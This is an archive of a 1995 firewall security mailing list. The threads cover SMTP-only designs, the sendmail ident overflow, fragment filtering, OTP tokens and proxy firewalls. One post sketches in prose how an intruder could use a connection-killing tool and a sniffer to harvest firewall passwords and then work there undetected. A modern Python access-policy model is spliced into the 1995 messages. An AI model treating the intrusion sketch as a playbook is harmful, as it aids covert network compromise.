From: claudio@fly.CNUCE.CNR.IT (Claudio Telmon)
Subject: help with begining options?
To: firewalls@greatcircle.com

> From: George Mullins
> Date: Tue, 2 May 1995 21:36:10 -0700
> Subject: Re: Help with begining options?
>
> Alan Hannan writes:
> > > The firewall should allow any outgoing traffic, but restrict incoming
> > > traffic to ONLY SMTP to one machine inside the net. All other servers
> > > (FTP, WWW, Etc. are in the unprotected network.)
> >
> > Of course you realize that by this method you make your entire internal
> > subnet only as strong as that SMTP server. Just an observation.
>
> And a wrong observation. While I would suggest using smap or sendmail
> on a machine on a DMZ network, if the only incoming traffic is
> restricted to SMTP, what is the attacker going to do that they
> couldn't do with any other type of firewall setup. Mail will be
> passed in any design.

The problem with the last sendmail bug wasn't the incoming SMTP connection,
it was the outgoing ident connection.
Correct me if I'm wrong, but by allowing any outgoing connection, the bug
could be exploited.

- Claudio
claudio@fire.di.unipi.it

From firewalls-owner Sun May 7 01:39:16 1995
From: Howard Berkowitz
Message-Id: <199505070827.EAA29067@clark.net>
Subject: Re: SNMP and firewalls (was Re: Source Code)
To: patrick@oes.amdahl.com (Patrick Horgan)
Date: Sun, 7 May 1995 04:27:48 -0400 (EDT)
Cc: hcb@clark.net, firewalls@greatcircle.com
In-Reply-To: <9505070548.AA19627@brittany.oes.amdahl.com> from "Patrick Horgan" at May 6, 95 10:48:56 pm

Patrick Horgan observed,
>
> Firewall-1 already uses SNMP for control.

My question is whether a vendor-independent firewall MIB would be practical
and useful.
Howard

From firewalls-owner Sun May 7 04:13:01 1995
To: firewalls@greatcircle.com
From: itl@iol.ie (Paul Murphy)
Subject: itl@iol.ie
Date: Sun, 7 May 1995 11:09:28

itl@iol.ie

From firewalls-owner Sun May 7 05:39:11 1995
Date: Sun, 7 May 95 08:18:03 -0400
Message-Id: <9505071218.AA07010@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: One Time Password Tokens

Basically there are two types of tokens today, time synchronous and
challenge response. Both work well (one went white water rafting in Alaska
with a SecurID in my wallet - it survived and have been using the same
SafeWord for over four years now) and each has limitations/strengths.
The time synchronous are the easiest to use, just read off a number and type
it in plus a PIN, the biggest problem being drift and a "window of
operation" that could be exploited. Challenge/response are a bit more
cumbersome to use - has a calculator-like keypad, you enter a PIN+challenge,
push a button, and then type in the response.

Both have the same fundamental drawback: cost, typically U$50-U$60 per user
- hard to justify for 170,000 users - and need to be replaced about every
three years on the average.

Recently two companies using challenge-response technology (Enigma-Logic
and Secure Computing) have introduced the next logical step, software based
tokens. In each, software is running in the background on the user's
computer that recognizes when a challenge is received and pops up a window
for the user to enter her/his/etc. PIN. The process is then handled entirely
in the background. As a result the PC becomes the token and no external
hardware is necessary. Further the cost is tied to software on the host
computer, token cost for the individual users can become zero (and has in
one case).

The problem with incorporating such a scheme to a time synchronous
operation is that the clock drift on a PC is notoriously bad. There is a way
that host/PC could first synchronize their clocks but I have not seen anyone
do that, yet.

Point is that PIN + PC keeps the two factor authentication deemed
sufficient (something you know - PIN - and something you have -
PC/software). True, software can be copied but there should be ways around
that limitation and the benefits would be IMNSHO well worth the additional
risk. Besides you can still have token cards for those "in harm's way",
this just lets everyone have them.
Warmly,
Padgett

From firewalls-owner Sun May 7 07:39:11 1995
Message-Id: <199505071421.HAA14474@miles.greatcircle.com>
From: Darren Reed
Subject: IP packet filtering...
To: firewalls@greatcircle.com
Date: Mon, 8 May 1995 00:23:35 +1000 (EST)

I'd like to suggest that anyone who filters by port or the "established"
bit in their firewall add a rule which works *before* anything which might
match that description to drop _all_ fragmented IP packets. They can pose
a very large problem and rather than speculate about whether your vendor's
filtering does it "right" or can handle it at all, it is better to just
make yourself immune.

I can't see anything in the FAQ about this and it has been quite a while
since I have seen anyone ask about this.

darren

From firewalls-owner Sun May 7 07:45:02 1995
From: Jas (Matthew K)
Message-Id: <199505071426.AAA02764@lordmuck.itd.uts.edu.au.>
Subject: Re: One Time Password Tokens
To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson P.E. Information Security)
Date: Mon, 8 May 1995 00:26:21 +1000 (EST)
Cc: firewalls@greatcircle.com (Firewalls Mailing List)
In-Reply-To: <9505071218.AA07010@uvs1.orl.mmc.com> from "A. Padgett Peterson, P.E. Information Security" at May 7, 95 08:18:03 am

A. Padgett Peterson, P.E. Information Security wrote this...
> The problem with incorporating such a scheme to a time synchronous
> operation is that the clock drift on a PC is notoriously bad. There
> is a way that host/PC could first synchronize their clocks but I
> have not seen anyone do that, yet.

SecureRPC has a mechanism that does exactly this.. has done for years, and
yes RPC is available for platforms other than Un*x

Matt
--
#!/bin/sh
echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit
Matthew Keenan    Systems Programmer    Information Technology Division
University of Technology Sydney    Australia

It's nice to be in a position where people apologize because they assume
there's humor in your work, based on past experience, but they're not sure
where it is.
-- Rob Pike

From firewalls-owner Sun May 7 08:39:31 1995
Date: Sun, 7 May 1995 11:27:02 -0400 (EDT)
From: Sick Puppy
Subject: Re: nuke vs firewalls
To: jsmith01@ozarks.sgcl.lib.mo.us
Cc: firewalls@GreatCircle.com

> From a Newbie: What is nuke?

It is a kewl tool, which forces a shutdown of all the TCP/IP connections to
a system. All the users get disconnected. A detailed discussion of exactly
how to use the nuke/sniffer combination to get the user-id and password of
EVERYONE that uses the system really belongs in alt.2600.

My interest in nuke is because some idiots permit rlogin or something
similar to the inside of their firewalls, which they assume are safe,
because they block such connections from the outside.

Suppose that Country Joe (CJ) has done his homework and has a sniffer
program running inside the network of Clueless Corp. which permits internal
rlogin or some such to its firewall. If CJ accesses their network via dial
up, he might be able to nuke the firewall and get the user-id and password
of everyone when they log back into it. There is at least one developer and
one other sys admin besides the guy who is responsible for running the
firewall, that have accounts on the firewall. Real dumb move by Clueless
Corp. Now CJ can do his own development in the firewall, preferably between
1 a.m. and 5 a.m.
and each of the three will think it is one of the others and be glad they
have a real life. If CJ does this about once a month, the sys admin dudes
will say "Gee, I wish those damn techs would stop fooling with the
routers." Assuming that CJ changes the account he uses every month, the
chance that the development he is doing in the firewall will be detected is
somewhere between zero and none.

> Joe Smith (Really!)

Yeah, and since I had my sex-change operation I have been the lesbian lover
of Princess Diana.

Sick Puppy the Cat_Eating_Dawg

From firewalls-owner Sun May 7 09:09:11 1995
From: Michael Richardson
Date: Sun, 7 May 1995 12:14:58 -0400
Message-Id: <199505071614.MAA19029@metis.milkyway.com>
To: hcb@clark.NET
Subject: Re: Source Code
Newsgroups: milkyway.mail.firewalls
In-Reply-To: <199505061711.NAA00687@clark.net>
References: <199505041530.IAA29745@lykos.netpart.com>
Organization: Milkyway Networks Corporation
Cc: firewalls@greatcircle.com

In article <199505061711.NAA00687@clark.net> you write:
>Your point reminded me of an idea with which I have been playing:
>managing
>firewalls using SNMP and a to-be-developed Firewall MIB.

We'd very much like to get a committee going to discuss such a MIB. At the
very least, SNMP alerts from the firewall would be very useful.

>Before the flamethrowers go on, let's assume that we are using
>an acceptably authenticated path for the SNMP flow. Whether this is
>SNMPv2, link encryption, etc., is irrelevant for the immediate discussion.

Yes.

>What I'd like the list to consider are what are the abstract mechanisms
>that reside on firewalls (including bastion hosts, screening routers,
>etc.). These abstractions are what a MIB would describe. We would

Would it be more appropriate to create a new list? Is there someone that is
familiar with the political formalities of creating MIBs, coordinating with
IETF, etc..?

>Complain all you like about software; there's nothing like a
>beta test on your body! :-)

The question is, Marcus, did S/HE use formal methods to design us? :-)

--
:!mcr!:             | Milkyway Networks Corporation
Michael Richardson  | Makers of the Black Hole firewall
NCF: aa714 || xx714 | +1 613 566-4574 ... mcr@milkyway.com
Home: mcr@sandelman.ocunix.on.ca. PGP key available.
From firewalls-owner Sun May 7 09:33:08 1995
From: Michael Richardson
Date: Sun, 7 May 1995 12:08:27 -0400
Message-Id: <199505071608.MAA18994@metis.milkyway.com>
To: maillet@doc.USmcs.maine.EDU
Subject: Re: What if I don't have a proxy for my application?
Newsgroups: milkyway.mail.firewalls
In-Reply-To: <9505061519.AA07745@doc.usmcs.maine.edu>
Organization: Milkyway Networks Corporation
Cc: firewalls@greatcircle.com

In article <9505061519.AA07745@doc.usmcs.maine.edu> you write:
>Hey All,
>  How do application level firewalls (e.g. BlackHole) handle applications
>that don't have a proxy program written for them?

We use a "circuit layer" proxy, to use Bellovin and Cheswick's terminology.
That is, a proxy that doesn't talk telnet or ftp, just moves the bytes. You
can configure the circuit layer proxy to listen on all 64k ports, and can
have it permit traffic from an IP address only after the user has
"preauthorized" the connection.
This is a typical configuration, but not the only one: user sits down in
the morning at workstation, uses telnet, ftp, gopher or http (in 2.0) to
enable transparent mode using a password of some type. At which point they
can use whatever service they want (finger, whois, doom, etc..) The admin
can still put denys on specific ports (e.g. no doom during the day), and can
selectively enable transparent mode. (It would be inappropriate for any
external address!)

[since I designed the rules for 2.0, I get to share my space with our
technical writer while he does the final draft next week...]

>database. If we (me.com) want to use an application firewall can we still
>use the datascan app even if the firewall has no datascan proxy? And

Yes.

>make things more interesting the internal PC is using RFC 1597 IP
>addresses.

It is still a proxy system, not a packet filter, so if you are configured
with private internal IP addresses (what we call Black Hole), then the
access will appear to come from the firewall's external address, not the
private addresses. If you have a WhiteHole configuration, then the accesses
appear to come from the internal addresses. A WhiteHole is probably required
to support Kerberos. We also support using some address that you pick on
outgoing connections.

>----- Ed Maillet
>maillet@usmcs.maine.edu

--
:!mcr!:             | Milkyway Networks Corporation
Michael Richardson  | Makers of the Black Hole firewall
NCF: aa714 || xx714 | +1 613 566-4574 ... mcr@milkyway.com
Home: mcr@sandelman.ocunix.on.ca. PGP key available.
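The access rules Michael describes for the circuit-layer proxy (per-address preauthorization after a password login, admin denies on specific ports by time of day, no transparent mode for external addresses, and Black Hole versus WhiteHole source addresses), as an added policy model that is not Milkyway's code. All class and function names, the addresses, the 10-hour session lifetime and the use of port 666 for doom are assumptions made for the example.

```python
import ipaddress
from dataclasses import dataclass
from datetime import datetime, time, timedelta
from typing import Dict, List, Optional, Tuple

# RFC 1597 private ranges: never routable on the outside, so a source in one
# of them must be presented as the firewall's own external address.
RFC1597_NETS = [ipaddress.ip_network(n)
                for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_rfc1597(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in RFC1597_NETS)


@dataclass
class PortDeny:
    """Admin deny on one destination port, optionally only inside a time window."""
    port: int
    start: Optional[time] = None   # None: denied around the clock
    end: Optional[time] = None

    def applies(self, port: int, when: datetime) -> bool:
        if port != self.port:
            return False
        if self.start is None or self.end is None:
            return True
        return self.start <= when.time() < self.end


@dataclass
class Decision:
    allowed: bool
    reason: str
    source_addr: Optional[str] = None   # address the outside world will see


class CircuitPolicy:
    """Decides whether the byte-moving relay may open a circuit for a client (hypothetical)."""

    def __init__(self, internal_nets: List[str], external_addr: str,
                 black_hole: bool = True,
                 session_ttl: timedelta = timedelta(hours=10)):
        self.internal_nets = [ipaddress.ip_network(n) for n in internal_nets]
        self.external_addr = external_addr
        self.black_hole = black_hole      # False models a WhiteHole configuration
        self.session_ttl = session_ttl    # assumed lifetime of "transparent mode"
        self.denies: List[PortDeny] = []
        self._sessions: Dict[str, Tuple[str, datetime]] = {}   # src -> (user, expiry)

    def is_internal(self, addr: str) -> bool:
        ip = ipaddress.ip_address(addr)
        return any(ip in net for net in self.internal_nets)

    def preauthorize(self, src: str, user: str, now: datetime, password_ok: bool) -> bool:
        """Enable transparent mode for src once the login service (the telnet,
        ftp, gopher or http step in the text) has verified the user's password."""
        if not password_ok:
            return False
        if not self.is_internal(src):
            return False   # transparent mode is never granted to an external address
        self._sessions[src] = (user, now + self.session_ttl)
        return True

    def decide(self, src: str, dst_port: int, now: datetime) -> Decision:
        sess = self._sessions.get(src)
        if sess is None or sess[1] <= now:
            self._sessions.pop(src, None)   # forget an expired session
            return Decision(False, "no preauthorized session for %s" % src)
        user, _ = sess
        for rule in self.denies:
            if rule.applies(dst_port, now):
                return Decision(False, "port %d denied by admin rule" % dst_port)
        # Black Hole (or any private source) appears as the firewall itself;
        # WhiteHole lets the real internal address show through.
        visible = self.external_addr if (self.black_hole or is_rfc1597(src)) else src
        return Decision(True, "transparent mode for %s" % user, visible)


def demo() -> dict:
    """Constructed scenario: one internal workstation, doom denied 09:00-17:00."""
    policy = CircuitPolicy(["192.168.77.0/24"], "192.0.2.1")
    policy.denies.append(PortDeny(666, time(9, 0), time(17, 0)))
    morning = datetime(1995, 5, 8, 8, 30)
    noon = datetime(1995, 5, 8, 12, 0)
    white = CircuitPolicy(["198.51.100.0/24"], "192.0.2.1", black_hole=False)
    white.preauthorize("198.51.100.7", "ed", morning, True)
    return {
        "before_login": policy.decide("192.168.77.21", 79, morning).allowed,
        "external_login": policy.preauthorize("192.0.2.99", "outsider", morning, True),
        "login": policy.preauthorize("192.168.77.21", "mcr", morning, True),
        "finger": policy.decide("192.168.77.21", 79, morning),
        "doom_morning": policy.decide("192.168.77.21", 666, morning).allowed,
        "doom_noon": policy.decide("192.168.77.21", 666, noon).allowed,
        "whitehole": white.decide("198.51.100.7", 80, morning).source_addr,
        "expired": policy.decide("192.168.77.21", 79, morning + timedelta(hours=11)).allowed,
    }
```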
From firewalls-owner Sun May 7 11:12:13 1995
Date: Sun, 7 May 1995 11:05:12 -0800
To: Darren Reed, firewalls@greatcircle.com
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Re: IP packet filtering...

At 12:23 AM 5/8/95, Darren Reed wrote:
>I'd like to suggest that anyone who filters by port or the "established"
>bit in their firewall add a rule which works *before* anything which might
>match that description to drop _all_ fragmented IP packets. They can pose
>a very large problem and rather than speculate about whether your vendor's
>filtering does it "right" or can handle it at all, it is better to just
>make yourself immune.
>
>I can't see anything in the FAQ about this and it has been quite a while
>since I have seen anyone ask about this.

Wait a sec... What's the problem with fragmented packets? Most filtering
systems apply filtering only to the first fragment, and simply let all
non-first fragments through. The assumption is that, if the filtering
system decides to drop the first fragment, it doesn't matter if the rest
get through, because the destination system won't be able to reassemble the
packet without the first fragment. It doesn't depend on the destination's
implementation; if the destination never sees the first fragment, it simply
_can't_ reassemble the packet, because it doesn't have all the data.
-Brent

----------------------------------------------------------------------
For info about the Internet Security Firewalls Tutorial and a schedule of
upcoming dates, please send email to Tutorial-Info@GreatCircle.COM
----------------------------------------------------------------------
Brent Chapman                   Great Circle Associates
Brent@GreatCircle.COM           1057 West Dana Street
+1 415 962 0841                 Mountain View, CA 94041

From firewalls-owner Sun May 7 14:39:27 1995
Date: Sun, 7 May 1995 17:21:03 -0400
To: firewalls@GreatCircle.COM
From: nit@LLC.org (Martin Durand)
Subject: fw newbie needs validation

We are about to get connected and the IS guys are nervous about their data
so they insist on a firewall. My budget is almost nil so we'll probably go
with TIS's fwtk running over FreeBSD 2.0.

If I understood what I gathered here and in Cheswick & Bellovin, our setup
would look like this:

 +-------------+    +---------+
 | Inside nets,|----|  Cisco  |----|
 | servers...  |    |  2504   |    |    +----------+
 +-------------+    | Eth-Eth |    |----|  Cisco   |----- Internet
                    +---------+    |    |  1003    |
                                   |    | Eth-ISDN |
                    +---------+    |    +----------+
                    |Firewall/|----|
                    |Bastion  |
                    |(fwtk)   |
                    +---------+

With static routes between the 1003<->firewall and 2504<->firewall.

Anything heretic/dumb/screwed/laughable... about this ?

__________________________.
Martin Durand | I know I should be working on my .sig file,
nit@llc.org   | but who reads these things...

From firewalls-owner Sun May 7 15:39:10 1995
From: Alan Hannan
Message-Id: <199505072226.RAA18708@jayhawk.mid.net>
Subject: Re: help with begining options?
To: claudio@fly.CNUCE.CNR.IT (Claudio Telmon)
Date: Sun, 7 May 1995 17:26:22 -0500 (CDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: from "Claudio Telmon" at May 5, 95 06:49:00 pm

> > Alan Hannan writes:
> > > > The firewall should allow any outgoing traffic, but restrict incoming
> > > > traffic to ONLY SMTP to one machine inside the net. All other servers
> > > > (FTP, WWW, Etc. are in the unprotected network.)
> > >
> > > Of course you realize that by this method you make your entire internal
> > > subnet only as strong as that SMTP server. Just an observation.
> >
> > And a wrong observation. While I would suggest using smap or sendmail
> > on a machine on a DMZ network, if the only incoming traffic is
> > restricted to SMTP, what is the attacker going to do that they
> > couldn't do with any other type of firewall setup. Mail will be
> > passed in any design.

I'm not sure I made my point.
Let us assume that a person can gain control of a firewall host by
sendmail. It then follows that if they have control of the firewall, they
(most likely) will have an easier time of exploiting the internal network.
True, having root privs on a firewall doesn't give a person control of the
internal network and internal hosts. However, it is rather difficult (in an
intelligently designed fw system) for a person to control internal hosts
without controlling the fw.

> The problem with the last sendmail bug wasn't the incoming SMTP connection, it
> was the outgoing ident connection. Correct me if I'm wrong, but by allowing any
> outgoing connection, the bug could be exploited.

True.

Sendmail Client ------ Sendmail Server ( ~= firewall in this case )

Client sends message to Server. Server sends ident query to Sendmail Client.
Sendmail Client would have a bogus ident server that overflows Sendmail
Server's buffer and does that wacky hacking stuff. Hence the security hole.

So, now all the Paranoid Corporations will only allow outgoing mail... ;)

--
alan@mid.net, (402) 472-0241 (voice)    Networked Systems Administrator
(402) 472-0240 (fax)                    MIDnet, the United States Oldest
                                        Regional Internet Service Provider
" They that can give up essential liberty to obtain a little temporary
safety deserve neither liberty nor safety. " - Benjamin Franklin

From firewalls-owner Sun May 7 20:09:13 1995
Message-Id: <199505080255.TAA23401@miles.greatcircle.com>
From: Darren Reed
Subject: Re: IP packet filtering...
To: Brent@GreatCircle.COM (Brent Chapman)
Date: Mon, 8 May 1995 12:57:44 +1000 (EST)
Cc: avalon@coombs.anu.edu.au, firewalls@greatcircle.com
In-Reply-To: from "Brent Chapman" at May 7, 95 11:05:12 am

In some mail from Brent Chapman, they said:
>
> At 12:23 AM 5/8/95, Darren Reed wrote:
> >I'd like to suggest that anyone who filters by port or the "established"
> >bit in their firewall add a rule which works *before* anything which might
> >match that description to drop _all_ fragmented IP packets. They can pose
> >a very large problem and rather than speculate about whether your vendor's
> >filtering does it "right" or can handle it at all, it is better to just
> >make yourself immune.
> >
> >I can't see anything in the FAQ about this and it has been quite a while
> >since I have seen anyone ask about this.
>
> Wait a sec... What's the problem with fragmented packets? Most filtering
> systems apply filtering only to the first fragment, and simply let all
> non-first fragments through. The assumption is that, if the filtering
> system decides to drop the first fragment, it doesn't matter if the rest
> get through, because the destination system won't be able to reassemble the
> packet without the first fragment. It doesn't depend on the destination's
> implementation; if the destination never sees the first fragment, it simply
> _can't_ reassemble the packet, because it doesn't have all the data.

Somewhat luckily for filtering, in TCP and UDP packets the port numbers are
almost assured of being in the first fragment. The "established" bit can be
in the 2nd or 3rd. And you *CAN* make a TCP connection with an MTU of 28,
successfully - I've done it. I'm not 100% convinced yet that you need a
first packet of at least that size.

Why drop all fragments ?
It reduces what some people are calling denial of service attack where you send lots of fragments towards a destination host and make it use all its network buffers for holding fragments which it is never going to use. Also, if I can fragment the first enough so that it gets through, then what ? darren From firewalls-owner Sun May 7 21:39:10 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA24636 for firewalls-outgoing; Sun, 7 May 1995 21:37:52 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id VAA24631 for ; Sun, 7 May 1995 21:37:48 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s8KaH-0001D0C; Sun, 7 May 95 21:38 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA20073; Sun, 7 May 1995 21:37:44 +0800 Date: Sun, 7 May 1995 21:37:44 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505080437.AA20073@brittany.oes.amdahl.com> To: Firewalls@GreatCircle.COM, bwern@jax.jaxnet.com Subject: Re: Help with begining options? Content-Length: 3554 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Hello. Hello Ben. > >This may not specifically be in the charter, but I'm asking anyways. I'm >trying to learn as much as possible about firewalls, etc. For my upcoming Good! Nothing improves security like an education. >pitch for an internet connection for my company. If you guys/gals have a >free second, I'd love it if you could look at what I am proposing, poke >holes in it, and tell me where to go for more information. If not, just >delete, but I'd appriciate it if you have the time. I'll have a go at it. >My current design consists of a router to connect to the 56k or ISDN link. >The router dumps into a unsecure subnet that consists of whatever >sacraficial lamb machines I have serving the outside word, and the Firewall. Here's a danger. 
You sometimes hear people talk about sacrificial lamb machines, (anyone know the reference for the first occurance?) It's a real danger to think this way. These machines are the closest machines on the internet to your "secure" machines. That means that their security profile should be as high as your firewall. If they aren't EXTREMELY secure, you're letting all sorts of riff-raff set up shop on your doorstep. The least consequence of this is that you'll be embarrassed when a security officer at another shop calls you up and wants to know why an attack is originating from one of your machines, or a court order is served seizing one or more of your machines because they harbor stolen software, (warez d00d!) How about finding out that someone is snooping all the passwords of all the users logging into machines on your site from outside, or vice-versa? Please be careful:) In any case, if you provide a writable directory on an ftp site, such as /pub/incoming, then make sure that you monitor it frequently. You'll find that they create directories that include backspaces in the name to "erase" the name when listed so that even an ls -a doesn't show them. (Of course the space is still left in the listing for it.) >The firewall connects to our internal network. The firewall should allow any >outgoing traffic, but restrict incoming traffic to ONLY SMTP to one machine >inside the net. All other servers (FTP, WWW, Etc. are in the unprotected >network.) This is a good design. Another choice, (and one worth investigating even in your scheme,) is to have a simpler smtp daemon take the initial connection, and then queue it via sendmail or smail. It still leaves you open to any holes based on addresses, but cuts out categories of holes that require a direct connection to the daemon. ( Of course we're sure that they're all found and fixed by now, eh? ;) >My question lies in the Firewall server. 
>I've been looking into Janus (or
>BorderWare, or whatever they're calling it now), but that seems to force us
>into using their application servers, and might limit us as far as options
>go. I've also been looking into Gauntlet, from TIS, and just using the FWTK
>kit. Unfortunately, I'm not expecting much money for this, so I expect I'll
>be forced to scrimp. :(

If you're forced to scrimp you could do worse than to use the FireWall ToolKit. It can be a bit frustrating for the users to have to stage through proxies, that require two stage connections, but you're in the ideal position, with users not yet used to a direct connection. If you use something that uses modified clients, such as socks, it's a lot nicer for your users though.

>
>Anyone care to offer thoughts, etc. for a new firewalls person?
>
>Thanks,

You're welcome.

Patrick

>
>Ben Wern

 _______________________________________________________________________
/ These opinions are mine, and not Amdahl's (except by coincidence;).  \
| (\                                                                   |
| Patrick J. Horgan         Amdahl Corporation          \\     Have    |
| patrick@amdahl.com        1250 East Arques Avenue      \\ _  Sword   |
| Phone : (408)992-2779     P.O. Box 3470 M/S 316         \\/  Will    |
| FAX   : (408)773-0833     Sunnyvale, CA 94088-3470     _/\\  Travel  |
\___________________________O16-2294_______________________\)__________/

From firewalls-owner Sun May 7 22:09:15 1995
Date: Sun, 7 May 1995 21:55:59 +0800
From: patrick@oes.amdahl.com (Patrick Horgan)
Message-Id: <9505080455.AA20086@brittany.oes.amdahl.com>
To: hcb@clark.net, patrick@oes.amdahl.com
Subject: Re: SNMP and firewalls (was Re: Source Code)
Cc: firewalls@greatcircle.com

>Patrick Horgan observed,
>>
>> Firewall-1 already uses SNMP for control.
>
>
>My question is whether a vendor-independent firewall MIB
>would be practical and useful.
>
>Howard
>

I quite think it would, and would not only support it, but like to work with a group to create it. It could only aid our industry to work toward standardisation.

Patrick

From firewalls-owner Sun May 7 23:09:14 1995
Date: Mon, 8 May 1995 02:01:01 -0400 (EDT)
From: Charles Kaplan
To: firewalls@greatcircle.com
Subject: ? about BBN's firewall

As I recall BBN's smartwatch? is based on TIS 2.x code. Was it customised by BBN to be transparent (yes I know TIS 3.x is now transparent) ? Is smartwatch transparent ? What proxies are offered ?

-Charles
Networking / Internetworking / Security / Object Technology
NT / UNIX / Novell

From firewalls-owner Sun May 7 23:21:24 1995
Date: Sun, 7 May 1995 22:53:35 +0800
From: patrick@oes.amdahl.com (Patrick Horgan)
Message-Id: <9505080553.AA20128@brittany.oes.amdahl.com>
To: avalon@coombs.anu.edu.au, firewalls@greatcircle.com
Subject: Re: IP packet filtering...

>I'd like to suggest that anyone who filters by port or the "established"
>bit in their firewall add a rule which works *before* anything which might
>match that description to drop _all_ fragmented IP packets. They can pose
>a very large problem and rather than speculate about whether your vendor's
>filtering does it "right" or can handle it at all, it is better to just
>make yourself immune.

It's unworkable.

Patrick

From firewalls-owner Mon May 8 00:09:15 1995
Date: Sun, 7 May 1995 23:57:32 -0800
To: Darren Reed
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Re: IP packet filtering...
Cc: avalon@coombs.anu.edu.au, firewalls@greatcircle.com

At 12:57 PM 5/8/95, Darren Reed wrote:
>In some mail from Brent Chapman, they said:
>>
>> Wait a sec... What's the problem with fragmented packets? Most filtering
>> systems apply filtering only to the first fragment, and simply let all
>> non-first fragments through.
>> The assumption is that, if the filtering
>> system decides to drop the first fragment, it doesn't matter if the rest
>> get through, because the destination system won't be able to reassemble the
>> packet without the first fragment. It doesn't depend on the destination's
>> implementation; if the destination never sees the first fragment, it simply
>> _can't_ reassemble the packet, because it doesn't have all the data.
>
>Somewhat luckily for filtering, in TCP and UDP packets the port numbers
>are almost assured of being in the first fragment. The "established"
>bit can be in the 2nd or 3rd. And you *CAN* make a TCP connection with an
>MTU of 28, successfully - I've done it. I'm not 100% convinced yet that
>you need a first packet of at least that size.

I would suggest that a filtering rule that included examination of the ACK bit should NOT match a fragment where it can't see the ACK bit; that seems the safe thing to do. Now, whether various vendors do that or not, I don't know; do any of the representatives of the various filtering products here want to comment on how their products handle this case?

>Why drop all fragments ? It reduces what some people are calling denial
>of service attack where you send lots of fragments towards a destination
>host and make it use all its network buffers for holding fragments which
>it is never going to use.

There are a _lot_ of ways (a seemingly infinite number of ways) to carry out denial of service attacks, starting with simply flooding those ports that you _do_ allow connections to. Why single out this one for special treatment? In my opinion, denial of service is one of the few cases where it's more appropriate to _respond_ to an attack than to _prevent_ it in the first place, because I don't really see any way to "prevent" them (there are so many of them) short of disconnecting from the network altogether.

>Also, if I can fragment the first enough so
>that it gets through, then what ?

Yes, then what... However, as I mentioned above, you shouldn't be able to get the first fragment through. If a rule wants to look at the ACK bit, and the first fragment is so short it doesn't include the ACK bit, the filtering system shouldn't apply that rule to it. I would consider any filtering system that lets such packets through on the basis of such a rule to be simply broken; it should be fixed.

-Brent
----------------------------------------------------------------------
For info about the Internet Security Firewalls Tutorial and a schedule
of upcoming dates, please send email to Tutorial-Info@GreatCircle.COM
----------------------------------------------------------------------
Brent Chapman                                   Great Circle Associates
Brent@GreatCircle.COM                           1057 West Dana Street
+1 415 962 0841                                 Mountain View, CA 94041

From firewalls-owner Mon May 8 03:39:21 1995
Date: Mon, 08 May 1995 12:27 +0100 (MET)
From: claudio@fly.CNUCE.CNR.IT (Claudio Telmon)
Subject: Re: help with begining options
To: firewalls@greatcircle.com

Alan Hannan writes:
>Sendmail Client would have a bogus ident server that overflows Sendmail Server's
>buffer and does that wacky hacking stuff. Hence the security hole. So, now
>all the Paranoid Corporations will only allow outgoing mail... ;)

My point was that the statement "Allow any outgoing traffic" is a dangerous one. Default should be "Deny any traffic" and then add only what you need, even for outgoing connections. This way, adding an SMTP connection won't give you a bonus (and dangerous) ident connection. The sendmail bug is just a nice example, since allowing only incoming SMTP seems to be a safe decision... BTW, I feel more comfortable with smap/smapd :)

- Claudio

From firewalls-owner Mon May 8 06:10:50 1995
From: tyork@doas.state.ga.us
Date: Mon, 8 May 1995 09:06:41 -0400
Message-Id: <9505081306.AA15787@mail.DOAS.State.GA.US>
To: firewalls@greatcircle.com
Subject: protecting dial-in/dial-out

I am trying to find some info on how modem access to a DEC Alpha attached to our network can be protected from unauthorized use. Is there a firewall or something like that? The machine is used for direct data transfers to our districts and is called by the district machines to update databases on the Alpha.

TIA
-TY
***************************************************************************
--> My chicken peck'en is mine and mine alone - Not my employers!
--> Tracy York                               tyork@doas.state.ga.us
--> State of Georgia - DOAS/MIS/CSS
--> 200 Piedmont Ave. SE, Ste 1620W
--> Atlanta, GA. 30334-9010                  Off Ph (404)657-4928
***************************************************************************

From firewalls-owner Mon May 8 06:42:36 1995
From: Alan Hannan
Message-Id: <199505081337.IAA15115@jayhawk.mid.net>
Subject: Re: SNMP and firewalls (was Re: Source Code)
To: patrick@oes.amdahl.com (Patrick Horgan)
Date: Mon, 8 May 1995 08:37:18 -0500 (CDT)
Cc: hcb@clark.net, patrick@oes.amdahl.com, firewalls@GreatCircle.COM
In-Reply-To: <9505080455.AA20086@brittany.oes.amdahl.com> from "Patrick Horgan" at May 7, 95 09:55:59 pm

> >Patrick Horgan observed,
> >>
> >> Firewall-1 already uses SNMP for control.
> >
> >
> >My question is whether a vendor-independent firewall MIB
> >would be practical and useful.
> >
> >Howard
> >
>
> I quite think it would, and would not only support it, but like to work
> with a group to create it. It could only aid our industry to work toward
> standardisation.

I agree, a standardized snmp control/reporting mechanism for firewalls would be great. I will set up a mailing list if there is any interest. Please let me know if you would use such a list.
From firewalls-owner Mon May 8 07:09:36 1995
From: Martin Durand
Message-Id: <199505081349.JAA27112@biko.llc.org>
Subject: Re: fw newbie needs validat
To: firewalls@greatcircle.com
Date: Mon, 8 May 1995 09:49:33 -0400 (EDT)
In-Reply-To: <00614.2882788084.3933@ecofin.uucp> from "John B*hrer" at May 8, 95 02:09:49 pm

> What means "NIL budget" in this context, that you can't afford $50'000 for
> FireWall-1 ?
> Why don't you spend some more and get the commercial BSDI Unix instead of
> FreeBie-SD ?

